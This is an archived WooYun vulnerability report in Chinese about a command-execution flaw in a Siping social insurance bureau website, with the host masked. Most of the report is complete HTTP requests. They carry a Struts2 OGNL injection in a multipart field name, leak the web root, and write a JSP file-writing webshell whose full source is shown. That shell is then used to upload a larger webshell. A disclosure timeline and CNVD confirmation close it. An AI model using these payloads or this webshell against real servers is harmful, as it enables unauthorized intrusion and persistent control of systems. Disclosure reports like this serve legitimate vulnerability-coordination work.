乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-15: 细节已通知厂商并且等待厂商处理中 2015-12-18: 厂商已经确认,细节仅向厂商公开 2015-12-28: 细节向核心白帽子及相关领域专家公开 2016-01-07: 细节向普通白帽子公开 2016-01-17: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
四平市社会保险事业管理局门户网站命令执行漏洞(新姿势)
访问url:http://**.**.**.**/main1.action,如图:
抓包修改数据包的method为POST方式,并获取web应用部署的绝对路径见如下:
POST /main1.action HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveCache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=9E8C1A55E69064893082E80E4A66D419; CNZZDATA3417230=cnzz_eid%3D7996912-1450007925-null%26ntime%3D1450014908Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721Content-Length: 258--------------------------5423a63046c50524a84963968721Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}"-1--------------------------5423a63046c50524a84963968721
执行效果如下图:
由于字节数限制,先写入一个小的webshell(homePage.jsp):
POST /main1.action HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveCache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=9E8C1A55E69064893082E80E4A66D419; CNZZDATA3417230=cnzz_eid%3D7996912-1450007925-null%26ntime%3D1450014908Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721Content-Length: 1127--------------------------5423a63046c50524a84963968721Content-Disposition: form-data; name="redirect:/${"x"+(new **.**.**.**.PrintWriter("D:\\webroot\\spshebao\\homePage.jsp")).append("<%@ page language=\"java\" import=\"java.util.*,**.**.**.**.*\" pageEncoding=\"UTF-8\"%><%response.setCharacterEncoding(\"UTF-8\")\u003bServletOutputStream output = response.getOutputStream()\u003bString filePath = request.getParameter(\"filePath\")\u003bString filename = request.getRealPath(filePath)\u003b**.**.**.**.File f = new **.**.**.**.File(filename)\u003bif (!f.exists()){ f.getParentFile().mkdirs()\u003b}try { OutputStream os = new FileOutputStream(filename)\u003b PrintWriter writer = new PrintWriter(new OutputStreamWriter(os, \"UTF-8\"))\u003b writer.print(request.getParameter(\"context\"))\u003b writer.flush()\u003b os.close()\u003b writer.close()\u003b out.clear()\u003b out = pageContext.pushBody()\u003b} catch (**.**.**.**.IOException e) { out.println(e.getMessage())\u003b}output.println(\"<result>OK</result>\")\u003boutput.flush()\u003boutput.close()\u003b %>").close()}"-1--------------------------5423a63046c50524a84963968721
再通过刚刚上传的小马,写入一个功能强大的大马(firstHomePage_bak.jsp)
POST /homePage.jsp HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveCache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=9E8C1A55E69064893082E80E4A66D419; CNZZDATA3417230=cnzz_eid%3D7996912-1450007925-null%26ntime%3D1450014908Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721Content-Length: 75710--------------------------5423a63046c50524a84963968721Content-Disposition: form-data; name="filePath"firstHomePage_bak.jsp--------------------------5423a63046c50524a84963968721Content-Disposition: form-data; name="context"大马内容在此--------------------------5423a63046c50524a84963968721
访问:http://**.**.**.**/firstHomePage_bak.jsp效果如下图:
危害等级:高
漏洞Rank:10
确认时间:2015-12-18 17:18
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给吉林分中心,由吉林分中心后续协调网站管理单位处置。
暂无